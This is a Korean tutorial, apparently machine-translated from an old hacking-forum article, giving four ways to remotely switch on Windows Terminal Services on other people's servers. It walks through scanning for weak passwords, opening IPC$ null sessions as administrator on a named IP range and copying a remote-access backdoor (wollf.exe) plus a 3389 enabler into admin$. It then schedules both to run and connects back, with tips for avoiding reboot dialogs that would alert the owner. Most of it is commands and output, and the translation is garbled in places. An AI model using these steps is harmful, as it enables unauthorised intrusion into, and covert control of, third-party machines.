첫 번째 방법:
사용 도구:
1:ipcscan 스캐너
2:터미널 서비스 연결 도구 xpts.exe(WIN) 2000 /
4:cscript(system32 폴더에 있으며 98개의 운영 체제에는 없을 수 있음
2: 단계:
1: ipcscan을 사용하여 취약한 비밀번호를 검색합니다( 직접 스캔할 수도 있습니다. 비밀번호가 약한 일부 호스트도 스캔했습니다. 실제 성능 시간은 포럼에 게시하겠습니다.)
2: rots.vbs를 사용하여 터미널 서비스 열기
설명 cscript ROTS.vbs <대상 IP> <사용자 이름> <비밀번호> [서비스 포트] [자동 재시작 옵션]
cscript.exe rots.vbs ip user userpass port /r 형식
또는 cscript.exe가 부패합니다. vbs ip user userpass port /fr>
3: 자주 묻는 질문(FAQ):
1: 스크립트는 대상 시스템 유형을 결정합니다. 서버 이상에서는 취소 여부를 묻는 메시지가 표시됩니다. Pro 버전에서는 터미널 서비스를 설치할 수 없기 때문에 스크립트 판단이 잘못된 것으로 확신되면 설치를 계속하십시오.
2: 연결 202.202.202.202 나타날 수 있습니다....오류0x80070776.오류 설명: 지정된 오류를 찾을 수 없습니다. 이 개체를 내보내는 경우 포기하는 것이 좋습니다.
3: 연결하지 못할 수 있습니다. 다음을 사용하세요. 형식 127.0.0.1:1818 1818은 방금 열린 포트입니다. 두 번째 방법:
입력 후: TELNET up!
c:\>echo [Components] > c:\rock
c:\>echo TSEnable = on >> c:\ rock
c:\>sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c :\rock /q
또는! >c:\>echo [구성 요소] > d:\wawa
c:\>echo TSEnable = on >> d:\wawa < /p>
c:\>sysocmgr /i: c:\winnt\inf\sysoc.inf /u:d:\wawa /q
자동으로 시작될 때까지 기다린 다음 확인< /p>
또는:
에서 dos 명령 edit를 로컬에서 사용하여 접미사가 .bat인 배치 파일을 만듭니다(파일 이름은 임의적임) echo [Components] > c:\sql
echo TSEnable = 켜짐 >>
c:\sqlsysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
net use \\ip 주소\ipc$ 비밀번호 /user: 사용자 이름(일반적으로 기본값: 관리자)
상대방의 서버 시간을 얻기 위해 시간에 사용합니다.
복사 경로:\xxx.bat \\ip 주소\$c:\winnt
시간 00:00:00 xxx.bat
서버 실행 명령 후 서버가 다시 시작되고 3389를 사용하여 로그인하면 괜찮습니다! 세 번째 방법:
입력 후 터미널 구성 요소가 설치되어 있는지 다시 확인하십시오.
c:\>사용자 쿼리
이 도구를 사용하려면 터미널 설치가 필요합니다. < /p>
다음이 반환되면 구성 요소가 설치되지 않았음을 확인합니다.
USERNAME SESSIONNAME ID STATE IDLE TIME LOGON TIME
>w1 콘솔 0 실행 중 . 2002- 1-12 22:5
\\이러한 정보는 구성 요소가 설치되었을 수 있습니다.
모든 것이 명확해졌습니다. < /p>
------------------ ------- --
C:\>dir c:\sysoc.inf /s //INF 위치 확인 file
c:\WINNT\inf 디렉토리
2000-01-10 20:00 3,770 sysoc.inf
1 파일 3,770바이트
------ ---------------- -------
C:\> dir c:\sysocmgr.* /s //컴포넌트 설치 프로그램 확인
c:\WINNT\system32 디렉터리
2000-01-10 20:00 42,768 sysocmgr.exe
파일 1개 42,768바이트
------------- -------- ------------------
c:\> echo [Components] > c:\rock
c:\> echo TSEnable = on >> c:\rock
//무인 설치를 생성하기 위한 매개변수입니다
c:\>c:\rock을 입력하세요.
[Components]
TSEnable = on
//매개변수 파일 확인
------------------------------------- -------
c:\>sysocmgr / i:c:\winnt\inf\sysoc.inf /u:c:\rock /q
-- ------ ------------------
구성 요소를 설치하는 실제 명령입니다.
위 명령은 /R 매개변수를 추가하지 않으며 설치 후 호스트가 자동으로 다시 시작됩니다. >/R 매개변수를 추가하면 호스트가 다시 시작되지 않습니다.
모든 것이 정상이면 다른 호스트가 다시 돌아오면 오프라인 상태가 됩니다.
3389 터미널 서비스가 시작됩니다.
질문 및 제안:
A 설치 과정에서 /R을 사용하지 않으면 호스트가 다시 시작되지 않는 경우가 있습니다. , 수동으로 다시 시작해야 합니다. 그러나 iisreset /reboot와 같은 명령을 사용하면 상대방이 이 시작을 유발한 사람과 횟수를 알려주는 대화 상자가 화면에 나타납니다. 다시 시작하기까지 몇 초 남았습니다.
B 한 번도 아닙니다.
다시 시도할 수 있는데 이는 실제로 매우 유용합니다.
C 설치를 시작하기 위해 sysocmgr 명령을 입력할 때 잘못된 명령 매개 변수를 입력하지 않도록 주의하십시오. 그렇지 않으면 다른 화면에 큰 대화 상자가 나타납니다. 도움말은 매우 눈에 띄고
확인이 필요하며 화면에는 응답이 없으며 오류가 있는지 알 수 없으므로 B의 제안이 있습니다. 네 번째 방법: < /p>
C:\Documents and Settings\shanlu.XZGJDOMAIN>net use \\218.22.155.*\ipc$ "" /us
er:administrator-- ---- ----------연결 성공!
명령이 성공적으로 완료되었습니다.
C:\Documents and Settings\shanlu.XZGJDOMAIN>wollf.exe \\218.22.155.*\admi 복사
n$--------- - ------대상 컴퓨터의 admin$ 디렉터리에 wollf.exe를 복사합니다.
1개의 파일이 복사되었습니다.
C:\Documents and Settings\shanlu.XZGJDOMAIN>hbulot.exe \\218.22.155.*\adm 복사
$---------- ------hbulot.exe를 대상 컴퓨터의 admin$ 디렉토리에 복사
1개의 파일이 복사되었습니다.
C:\Documents and Settings\shanlu.XZGJDOMAIN>순시간 \\218.22.155.*
\\218.22.155.*의 현재 시간은 2002/12/입니다. 1 06:37 AM
명령이 성공적으로 완료되었습니다.
C:\Documents and Settings\shanlu.XZGJDOMAIN>\\218.22.155.* 06:39 wollf.exe
새 작업이 추가되었습니다. 작업 ID = 1--06:39에 실행되도록 wollf.exe를 지정하세요.
------------------ ---- -------------------- ---- ---------
참고:
wollf.exe는 nc나 winshell을 좋아하는 많은 전문가들이 있지만 저는 약한 부분이 있습니다. 그것을 위해! 여기서는 이 기사의 내용과 관련된 명령 매개변수만 소개하고 고급 사용법을 보완하지는 않습니다.
hbulot.exe는 3389 서비스를 시작하는 데 사용됩니다. 서버 이상이 아닌 경우 실행하지 마십시오. 프로 버전은 터미널 서비스를 설치할 수 없기 때문입니다.
2분 후...
--------------- ---- -------------------- ---- ---------
C:\Documents and Settings\shanlu.XZGJDOMAIN>wollf -connect 218.22.155.* 7614
"Wollf 원격 관리자" v1. 6
코드: wollf, ) 원본 출처: /Article/Text2/dos/200807/10761.html